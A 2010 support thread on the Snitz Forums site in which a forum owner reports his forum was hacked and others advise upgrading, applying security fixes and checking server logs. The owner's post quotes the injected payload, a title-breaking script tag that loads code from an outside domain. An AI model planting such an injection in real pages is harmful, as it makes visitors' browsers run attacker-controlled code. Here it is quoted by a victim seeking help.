Snitz Forums 2000
Snitz Forums 2000
Home | Profile | Register | Active Topics | Members | Search | FAQ
 All Forums
 Community Forums
 Community Discussions (All other subjects)
 My Forum was Hacked

Note: You must be registered in order to post a reply.
To register, click here. Registration is FREE!
Before posting, make sure you have read this topic!

Screensize:
UserName:
Password:
Format Mode:
Format: BoldItalicizedUnderlineStrikethrough Align LeftCenteredAlign Right Horizontal Rule Insert HyperlinkInsert EmailInsert Image Insert CodeInsert QuoteInsert List
   
Message:

* HTML is OFF
* Forum Code is ON
Smilies
Smile [:)] Big Smile [:D] Cool [8D] Blush [:I]
Tongue [:P] Evil [):] Wink [;)] Clown [:o)]
Black Eye [B)] Eight Ball [8] Frown [:(] Shy [8)]
Shocked [:0] Angry [:(!] Dead [xx(] Sleepy [|)]
Kisses [:X] Approve [^] Disapprove [V] Question [?]

 
   

T O P I C    R E V I E W
bendecko Posted - 01 October 2010 : 08:21:18
Hi

http://www.thegamersguild.co.uk/forum/

</title><script src=http://google-stats49.info/ur.php></script> seems to be what they entered.

You can see this on the Title of General forum.

I was under the impression Snitz was not vunerable to SQL injection?

What can I do to clean this up?

What can I do to prevent it happening.

Thanks

Ben
3   L A T E S T    R E P L I E S    (Newest First)
ruirib Posted - 08 October 2010 : 07:01:36
Unfortunately I cannot be sure they are included. If someone else can shed any light on that, please do.

It is, however, easy to check if they are in the code. Just have a look at how the code should look after the fixes (each fix provides information about that) and confirm that the fixes are in the downloaded code. If they are not, then add them.

I will perform this check later, as I can't do it where I am now.
bendecko Posted - 08 October 2010 : 06:13:02
OK I upgraded to the lastest version.

What about security fixeds for the latest version?

E.g. http://forum.snitz.com/forum/topic.asp?TOPIC_ID=69117

Have these been added to the download or need I do these manually?
ruirib Posted - 01 October 2010 : 09:39:51
You cannot make any assumptions unless you are running our latest version, with the latest security fixes applied. The current version with all the fixes applied (I would almost risk saying the downloadable version has the security fixes applied, but I can't say it with complete certainty) has no known vulnerabilities. In the current day and age that's all we can guarantee.

I would say that if you don't have mods, just upgrade to the latest version and check if the most recent security fixes are applied. If you have mods and don't want to apply them again, I suggest that you apply all the security fixes that are applicable to your forum version (3.4.06).

You can also have a look at the server logs, to find out how they did hacked the forum. Should be rather easy to do that, if you have access to the server logs.

Snitz Forums 2000 © 2000-2021 Snitz™ Communications Go To Top Of Page
This page was generated in 0.06 seconds. Powered By: Snitz Forums 2000 Version 3.4.07